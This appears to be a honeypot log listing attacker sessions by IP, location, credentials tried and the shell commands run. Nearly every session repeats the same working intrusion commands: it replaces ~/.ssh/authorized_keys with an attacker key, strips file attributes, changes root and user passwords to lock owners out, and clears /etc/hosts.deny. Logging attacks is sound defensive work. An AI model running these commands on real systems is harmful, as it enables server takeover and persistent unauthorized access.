$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:JC6iQukWujbs"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
🎭 star_root_18 (130.94.107.18) β€” Nashville, United States Β· 1 session Β· 1 cmd
2026-06-07 19:37 EDT Β· as root/jimster@2024
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 wraith_3 (83.235.16.111) β€” Athens, Greece Β· 1 session Β· 20 cmds
2026-06-07 19:28 EDT Β· as iptv/1
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "1\ng7Fb2x2SFcx5\ng7Fb2x2SFcx5"|passwd|bash
$ Enter new UNIX password:
$ echo "1\ng7Fb2x2SFcx5\ng7Fb2x2SFcx5\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 liberty (162.240.57.187) β€” Phoenix, United States Β· 1 session Β· 1 cmd
2026-06-07 19:15 EDT Β· as jimster/Jimster@2026
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 shadow_root_16 (103.146.159.173) β€” Sheung Wan, Hong Kong Β· 1 session Β· 20 cmds
2026-06-07 19:12 EDT Β· as laser/laser
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "laser\nT7JykcjlPCml\nT7JykcjlPCml"|passwd|bash
$ Enter new UNIX password:
$ echo "laser\nT7JykcjlPCml\nT7JykcjlPCml\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 ghost_root_44 (103.90.227.203) β€” QuαΊ­n PhΓΊ NhuαΊ­n, Vietnam Β· 1 session Β· 19 cmds
2026-06-07 18:56 EDT Β· as root/Qwerasdf
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:W45xjePS8dqR"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 rogue_7 (202.51.214.98) β€” Jakarta, Indonesia Β· 1 session Β· 20 cmds
2026-06-07 18:32 EDT Β· as forums/123456
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "123456\n4A6jZLadp4NQ\n4A6jZLadp4NQ"|passwd|bash
$ Enter new UNIX password:
$ echo "123456\n4A6jZLadp4NQ\n4A6jZLadp4NQ\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 wok_root_3 (14.103.112.122) β€” Beijing, China Β· 1 session Β· 19 cmds
2026-06-07 17:40 EDT Β· as root/qq123456+
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:lsqeYax0JT7i"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 cipher_root_10 (160.174.129.232) β€” Rabat, Morocco Β· 4 sessions Β· 78 cmds
2026-05-17 00:04 EDT Β· as ashok/ashok, root/12qwaszx!@QWASZX, root/Ws123456
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—4 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—4 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—4 // CPU profiling
$ echo -e "12345\nxdifmHCTnGsZ\nxdifmHCTnGsZ"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "12345\nxdifmHCTnGsZ\nxdifmHCTnGsZ\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—4 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—4
$ ls -lh $(which ls) Γ—4
$ which ls Γ—4
$ crontab -l Γ—4 // persistence setup
$ w Γ—4 // logged-in users check
$ uname -m Γ—4
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—4 // CPU profiling
$ top Γ—4 // process monitoring
$ uname Γ—4 // OS identification
$ uname -a Γ—4 // OS/kernel identification
$ whoami Γ—4 // privilege check
$ lscpu | grep Model Γ—4
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—4
$ echo -e "ashok\nQ8pX0yGYzZF2\nQ8pX0yGYzZF2"|passwd|bash
$ echo "ashok\nQ8pX0yGYzZF2\nQ8pX0yGYzZF2\n"|passwd
$ echo "root:mhu216qstQaV"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ echo "root:VJ0YnlYf2SOe"|chpasswd|bash
🎭 ghost (20.203.59.187) β€” Dubai, United Arab Emirates Β· 1 session Β· 20 cmds
2026-06-07 17:33 EDT Β· as guest/password
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "password\nw9eA7cY2ZKVj\nw9eA7cY2ZKVj"|passwd|bash
$ Enter new UNIX password:
$ echo "password\nw9eA7cY2ZKVj\nw9eA7cY2ZKVj\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 bear_root_2 (176.109.97.11) β€” Moscow, Russia Β· 1 session Β· 20 cmds
2026-06-07 17:07 EDT Β· as scanner/12345
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "12345\nR6XujydbB23v\nR6XujydbB23v"|passwd|bash
$ Enter new UNIX password:
$ echo "12345\nR6XujydbB23v\nR6XujydbB23v\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 viking_sol (91.92.42.19) β€” Stockholm, Sweden Β· 1 session Β· 1 cmd
2026-06-07 17:05 EDT Β· as bob/1234
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -s -v -n -r -m
🎭 bike_root_8 (159.223.213.49) β€” Amsterdam, Netherlands Β· 2 sessions Β· 40 cmds
2026-06-07 16:35 EDT Β· as sites/sites, sun/123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "123\nKaUriCuoOS35\nKaUriCuoOS35"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "123\nKaUriCuoOS35\nKaUriCuoOS35\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "sites\nyZFWqbn3h93o\nyZFWqbn3h93o"|passwd|bash
$ echo "sites\nyZFWqbn3h93o\nyZFWqbn3h93o\n"|passwd
🎭 shadow_3 (94.158.49.223) β€” Guliston, Uzbekistan Β· 1 session Β· 20 cmds
2026-06-07 16:21 EDT Β· as sun/123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "123\nYIbsJ10sV2cP\nYIbsJ10sV2cP"|passwd|bash
$ Enter new UNIX password:
$ echo "123\nYIbsJ10sV2cP\nYIbsJ10sV2cP\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 wok_root_4 (58.213.107.138) β€” Nanjing, China Β· 2 sessions Β· 39 cmds
2026-06-07 15:51 EDT Β· as orangepi/orangepi, root/abc123#@!
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "orangepi\nwXbG73P7g0iv\nwXbG73P7g0iv"|passwd|bash
$ Enter new UNIX password:
$ echo "orangepi\nwXbG73P7g0iv\nwXbG73P7g0iv\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:xzW8YT49xK8k"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
🎭 shadow_4 (103.187.146.131) β€” Jakarta, Indonesia Β· 1 session Β· 20 cmds
2026-06-07 15:06 EDT Β· as nick/changeme
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "changeme\npUv3adj7v1Jj\npUv3adj7v1Jj"|passwd|bash
$ Enter new UNIX password:
$ echo "changeme\npUv3adj7v1Jj\npUv3adj7v1Jj\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 shadow_root_30 (103.75.182.132) β€” Thα»§ Đức, Vietnam Β· 1 session Β· 20 cmds
2026-06-07 14:41 EDT Β· as deploy/777
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "777\nDLzghJOWgZRi\nDLzghJOWgZRi"|passwd|bash
$ Enter new UNIX password:
$ echo "777\nDLzghJOWgZRi\nDLzghJOWgZRi\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 lantern_root_6 (171.80.9.211) β€” Shizishan, China Β· 1 session Β· 1 cmd
2026-06-07 14:27 EDT Β· as root/ο»Ώ------fuck------
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -s -m
🎭 star_root_19 (178.156.198.226) β€” Ashburn, United States Β· 1 session Β· 1 cmd
2026-06-07 13:38 EDT Β· as admin/jimster@123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
